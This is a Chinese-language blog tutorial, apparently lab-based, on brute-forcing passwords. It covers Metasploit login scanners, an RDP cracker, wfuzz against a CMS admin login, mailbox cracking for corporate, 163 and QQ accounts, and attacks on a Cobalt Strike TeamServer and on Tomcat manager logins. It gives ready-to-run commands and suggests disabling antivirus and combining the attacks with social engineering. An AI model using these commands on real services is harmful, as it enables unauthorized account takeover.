穷举


穷举篇

metasploit 穷举模块的使用

metasploit 是一个渗透测试集成套件 同样也有穷举模块

auxiliary/scanner/ftp/ftp_login

auxiliary/scanner/ssh/ssh_login

auxiliary/scanner/telnet/telnet_login

auxiliary/scanner/smb/smb_loginauxiliary/scanner/mssql/mssql_login

auxiliary/scanner/mysql/mysql_login

auxiliary/scanner/oracle/oracle_login

auxiliary/scanner/postgres/postgres_login

auxiliary/scanner/vnc/vnc_login

auxiliary/scanner/pcanywhere/pcanywhere_login

auxiliary/scanner/snmp/snmp_login

用法:

在终端下启动msf:

msfconsole

image-20210803131519881

使用mssql_login模块:

use auxiliary/scanner/mssql/mssql_login

image-20210803131630299

查看需要设置的参数:

show options

image-20210803131747617

yes是必须设置的

设置参数:

set RHOSTS 192.168.0.127  设置目标ip
set STOP_ON_SUCCESS true  设置成功后结束穷举
set PASS_FILE /root/top100.txt  设置密码字典

再次查看参数看看是否设置进去了

image-20210803132308265

启动:

run   或
exploit

image-20210803132341545

成功穷举出来了

御剑 RDP 爆破工具的使用

image-20210803132436815

在这里设置信息

image-20210803132505980

image-20210803132537815

image-20210803132601982

start

image-20210803132626148

俩个ip对应的账号密码都穷举出来了

wfuzz 多线程穷举密码

它是kali下的一个终端工具,相比较bp它可以使用百万字典,

image-20210803132859809

Usage: wfuzz [options] -z payload,params

Examples:

wfuzz -c -z file,users.txt -z file,pass.txt –sc 200 http://www.site.com/log.asp?user=FUZZ&pass=FUZ2Z

wfuzz -c -z range,1-10 –hc=BBB http://www.site.com/FUZZ{something not there}wfuzz –script=robots -z list,robots.txt http://www.webscantest.com/FUZZ

wfuzz -c -z file,2019_top100.txt –sc 302 -u

http://www.c1moon.com/admin/index.php?action=login -d “user=admin&pw=FUZZ”

wfuzz -c -z file,2019_top100.txt –hc 404 –hh 1549 -u

http://www.c1moon.com/admin/index.php?action=login -d “user=admin&pw=FUZZ”

wfuzz -c -w /home/kali/csdnpass.txt –hc 404 –hh 1549 -u

http://www.c1moon.com/admin/index.php?action=login -d “user=admin&pw=FUZZ”

帮助文档:

image-20210803133424033

接下来我们使用此工具

image-20210803133059748

我们用百万字典来扫第一台靶机的c1后台登录

file,后不能有空格

wfuzz -c -z file,/root/csdnpass.txt --sc 302 -u http://www.c1moon.com/admin/index.php?action=login -d"user=admin&pw=FUZZ"

image-20210803134018779

也可用-w替代-z

wfuzz -c -w /root/csdnpass.txt --sc 302 -u http://www.c1moon.com/admin/index.php?action=login -d"user=admin&pw=FUZZ" 

邮箱密码的穷举

默认的收发邮件端口信息

发邮件 pop3 110 加密 995

收邮件 smtp 25 加密 465

企业独立搭建的邮服 用 MailCracker 进行破解

开启此工具之前记得关下火绒,不然打不开

image-20210803134223840

拿到账号密码后我们可以用foxmail软件登录

163 qq 邮箱用脚本和mailcracker穷举

163 qq 这些邮箱,并发会拦截,而且不能穷举太多。一般配合社工办法来穷举

脚本

我们把脚本 用户 密码 放到一个文件夹下

image-20210804172840723

使用命令开始穷举

python email.py 163 user.txt pass.txt

image-20210804173031548

mailcracker工具

也穷举出来了

image-20210804172037036

CobaltStrike TeamServer 口令暴力破解

Cobalt Strike 是一款超级好用的渗透测试工具,拥有多种协议主机上线方式,集成了提权,凭据导出,端口转发,socket 代理,office 攻击,文件捆绑,钓鱼等多种功能。同时,Cobalt Strike 还可以调用 Mimikatz 等其他知名工具,因此广受技术大佬的喜爱。

Cobalt Strike 是由美国 Red Team 开发,官网地址:http://cobaltstrike.com

这个工具的社区版是大家熟知的 Armitage(一个 MSF 的图形化界面工具),而

Cobalt Strike 大家可以理解其为 Armitage 的商业版

关于 Cobalt Strike 的口令暴力破解

众所周知 Cobalt Strike 的工作方式是以 TeamServer 为核心,可多个 Cilent 的 CS(Server Cilent)架构。

​ 启动teamserver

./teamserver 192.168.0.134 qweasd123

sh 可执行脚本 相当于windows bat文件

chmod +x 文件名.sh 添加权限

chmod -x 文件名.sh 删除权限

./文件名.sh 执行文件

启动 temaerver 之后可以通过客户端连接连接服务器 默认的端口是 50050 密码是 qweasd123 即可登录。

image-20210804200623532

如果把 teamserver 放在公网上,口令设置薄弱 可以通过对其穷举有一定的几率获取 teamserver 的权限,那么服务器里的被成功控制的机器,我们也可以对其控制。所以说危害是非常大的。

我们打开cobaltstrike 试试

image-20210804200951228

image-20210804201005915

image-20210804201028597

接下来我们使用csbuster.py对50050端口进行穷举

我们在另一台kali上操作

我们首先查看50050端口是否开放

nmap -p 50050 192.168.0.134

开放的

image-20210804201157076

查看脚本参数

image-20210804201318677

使用写好的py脚本

python3 csbuster.py 192.168.0.134 /root/桌面/12306top100.txt -t 20

image-20210804201339564

线程20查不到我们可以尝试线程调小,发现穷举出来了密码

我们在本机就可以使用此账号密码登录cobaltstrike

image-20210804201650552

对 apache-tomcat进行穷举

Apache Tomcat 是世界上使用最广泛的 Java Web 应用服务器之一,绝大数人都会使用 Tomcat 的默认配置。然而默认配置中会有一个向外网开放的 Web 应用管理器,管理员可以利用它在服务器中启动、停止、添加和删除应用。

默认8080,改成8081

image-20210804201852678

登录进来后

image-20210804201956313

我们可以使用msfconsole中的auxiliary/scanner/http/tomcat_mgr_login模块进行穷举

设置好参数

image-20210804202912968

image-20210804202925684

这样我们就能通过ip:端口的方式登录

超级弱口令检查穷举使用

我们把俩个靶机的ip放进去,选择我们开的服务进行穷举

image-20210804203014904


文章作者: 晓莎K
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 晓莎K !
评论
  目录